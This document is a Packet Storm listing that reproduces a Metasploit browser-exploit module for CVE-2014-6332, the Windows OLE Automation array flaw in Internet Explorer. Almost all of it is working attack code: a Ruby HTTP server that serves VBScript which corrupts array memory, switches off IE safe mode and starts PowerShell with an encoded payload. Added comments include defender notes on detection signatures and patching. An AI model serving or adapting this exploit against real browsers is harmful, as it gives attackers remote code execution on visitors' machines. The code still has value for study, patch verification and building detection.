
Windows OLE Automation Array Remote Code Execution

🗓️ 13 Nov 2014 00:00:00 · Reported by IBM · Type: packetstorm
🔗 packetstormsecurity.com👁 73 Views

Windows OLE Automation Array Remote Code Execution in Internet Explorer

Code
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'msf/core/exploit/powershell'  
  
# Metasploit browser-exploit module for CVE-2014-6332 (Windows OLE Automation
# array handling, reached through VBScript in Internet Explorer).
#
# The module runs an HTTP server (HttpServer::HTML mixin) and answers each
# request with the same HTML template. The VBScript in that page ends by
# starting powershell.exe through Shell.Application.
#
# Defender notes, all taken from what this file shows:
# - Remediation is the vendor update the description refers to as MS-14-064.
# - The served page forces IE8 document mode (X-UA-Compatible IE=EmulateIE8)
#   and carries two <SCRIPT LANGUAGE="VBScript"> blocks; both are usable
#   content signatures for proxy or IDS inspection.
# - The final stage is a ShellExecute of "powershell.exe", so a PowerShell
#   process started from a browsing session is the host-side signal to alert on.
# - The script exits early for user agents containing "Win64" and for user
#   agents without "MSIE"; that filtering is done client-side, not by the server.
class Metasploit3 < Msf::Exploit::Remote  
# Module's self-declared reliability rank.
Rank = ExcellentRanking  
  
# HTTP server plumbing (provides on_request_uri / send_response).
include Msf::Exploit::Remote::HttpServer::HTML  
# Provides cmd_psh_payload, used to wrap the payload in a PowerShell command.
include Msf::Exploit::Powershell  
  
# Registers the module metadata (name, description, authors, references,
# payload constraints, platform, targets) with the framework.
#
# info - metadata hash supplied by the framework; merged via update_info.
def initialize(info={})  
super(update_info(info,  
'Name' => "Windows OLE Automation Array Remote Code Execution",  
# NOTE(review): the description text is garbled ("This modules",
# "Internet MS-14-064"); it presumably means Microsoft bulletin MS14-064.
# It is a runtime string, so fixing it is a code change, not a comment change.
'Description' => %q{  
This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.   
Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.   
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'IBM', # Discovery  
'yuange <twitter.com/yuange75>', # PoC  
'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit  
'Wesley Neelen <security[at]forsec.nl>' #Metasploit  
],  
# Only the CVE is listed; the bulletin id appears in the description text only,
# so tooling that keys on References will not see it.
'References' =>  
[  
[ 'CVE', '2014-6332' ]  
],  
# NUL is declared as the only bad character for the encoded payload.
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
# Sets the EXITFUNC option default to "none".
'DefaultOptions' =>  
{  
'EXITFUNC' => "none"  
},  
'Platform' => 'win',  
# Single catch-all target with no per-version settings; the version-dependent
# branching visible in this file lives in the VBScript (user-agent parsing).
'Targets' =>   
[  
[ 'Automatic', {} ]  
],  
'Privileged' => false,  
'DisclosureDate' => "November 12 2014",  
'DefaultTarget' => 0))  
end  
  
# HTTP request handler: builds the PowerShell command line for the selected
# payload and sends the HTML/VBScript page back to the client.
#
# cli     - client connection, passed through to send_response.
# request - the incoming request; it is not read in this method, so the same
#           page is returned whatever the path, headers or user agent.
def on_request_uri(cli, request)  
# Wrap the encoded payload as a PowerShell command (x86, without the
# %COMSPEC% prefix).
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })  
# Drop the leading executable name: the VBScript below passes
# "powershell.exe" to ShellExecute separately and uses payl as the arguments.
payl.slice! "powershell.exe "  
  
# Page template. Everything up to EOS is a runtime string and is sent to the
# client as-is apart from the #{payl} interpolation. The first script block
# defines trigger(), which launches PowerShell; the second block runs Begin()
# on load and calls trigger() at the end of setnotsafemode().
html = <<-EOS  
<!doctype html>  
  
<html>  
  
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >  
  
<head>  
  
</head>  
  
<body>  
  
  
<SCRIPT LANGUAGE="VBScript">  
  
  
function trigger()   
  
On Error Resume Next  
  
set shell=createobject("Shell.Application")  
  
shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1  
  
end function  
  
  
</script>  
  
  
<SCRIPT LANGUAGE="VBScript">  
  
  
  
dim aa()  
  
dim ab()  
  
dim a0  
  
dim a1  
  
dim a2  
  
dim a3  
  
dim win9x  
  
dim intVersion  
  
dim rnda  
  
dim funclass  
  
dim myarray  
  
  
Begin()  
  
  
function Begin()  
  
On Error Resume Next  
  
info=Navigator.UserAgent  
  
  
if(instr(info,"Win64")>0) then  
  
exit function  
  
end if  
  
  
if (instr(info,"MSIE")>0) then   
  
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  
else  
  
exit function   
  
  
  
end if  
  
  
win9x=0  
  
  
BeginInit()  
  
If Create()=True Then  
  
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
  
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  
  
if(intVersion<4) then  
  
document.write("<br> IE")  
  
document.write(intVersion)  
  
runshellcode()   
  
else   
  
setnotsafemode()  
  
end if  
  
end if  
  
end function  
  
  
function BeginInit()  
  
Randomize()  
  
redim aa(5)  
  
redim ab(5)  
  
a0=13+17*rnd(6)  
  
a3=7+3*rnd(5)  
  
end function  
  
  
function Create()  
  
On Error Resume Next  
  
dim i  
  
Create=False  
  
For i = 0 To 400  
  
If Over()=True Then  
  
' document.write(i)   
  
Create=True  
  
Exit For  
  
End If   
  
Next  
  
end function  
  
  
sub testaa()  
  
end sub  
  
  
function mydata()  
  
On Error Resume Next  
  
i=testaa  
  
i=null  
  
redim Preserve aa(a2)   
  
  
  
ab(0)=0  
  
aa(a1)=i  
  
ab(0)=6.36598737437801E-314  
  
  
aa(a1+2)=myarray  
  
ab(2)=1.74088534731324E-310   
  
mydata=aa(a1)  
  
redim Preserve aa(a0)   
  
end function   
  
  
  
function setnotsafemode()  
  
On Error Resume Next  
  
i=mydata()   
  
i=readmemo(i+8)  
  
i=readmemo(i+16)  
  
j=readmemo(i+&h134)   
  
for k=0 to &h60 step 4  
  
j=readmemo(i+&h120+k)  
  
if(j=14) then  
  
j=0   
  
redim Preserve aa(a2)   
  
aa(a1+2)(i+&h11c+k)=ab(4)  
  
redim Preserve aa(a0)   
  
  
j=0   
  
j=readmemo(i+&h120+k)   
  
  
  
Exit for  
  
end if  
  
  
next   
  
ab(2)=1.69759663316747E-313  
  
trigger()   
  
end function  
  
  
function Over()  
  
On Error Resume Next  
  
dim type1,type2,type3  
  
Over=False  
  
a0=a0+a3  
  
a1=a0+2  
  
a2=a0+&h8000000  
  
  
  
redim Preserve aa(a0)   
  
redim ab(a0)   
  
  
  
redim Preserve aa(a2)  
  
  
  
type1=1  
  
ab(0)=1.123456789012345678901234567890  
  
aa(a0)=10  
  
  
  
If(IsObject(aa(a1-1)) = False) Then  
  
if(intVersion<4) then  
  
mem=cint(a0+1)*16   
  
j=vartype(aa(a1-1))  
  
if((j=mem+4) or (j*8=mem+8)) then  
  
if(vartype(aa(a1-1))<>0) Then   
  
If(IsObject(aa(a1)) = False ) Then   
  
type1=VarType(aa(a1))  
  
end if   
  
end if  
  
else  
  
redim Preserve aa(a0)  
  
exit function  
  
  
end if   
  
else  
  
if(vartype(aa(a1-1))<>0) Then   
  
If(IsObject(aa(a1)) = False ) Then  
  
type1=VarType(aa(a1))  
  
end if   
  
end if  
  
end if  
  
end if  
  
  
  
  
  
If(type1=&h2f66) Then   
  
Over=True   
  
End If   
  
If(type1=&hB9AD) Then  
  
Over=True  
  
win9x=1  
  
End If   
  
  
redim Preserve aa(a0)   
  
  
  
end function  
  
  
function ReadMemo(add)   
  
On Error Resume Next  
  
redim Preserve aa(a2)   
  
  
  
ab(0)=0   
  
aa(a1)=add+4   
  
ab(0)=1.69759663316747E-313   
  
ReadMemo=lenb(aa(a1))   
  
  
  
ab(0)=0   
  
  
  
redim Preserve aa(a0)  
  
end function  
  
  
</script>  
  
  
</body>  
  
</html>  
EOS  
  
# Console status line for the operator, then the page goes out as text/html.
print_status("Sending html")  
send_response(cli, html, {'Content-Type'=>'text/html'})  
  
end  
  
end  
  
`


13 Nov 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.94094
73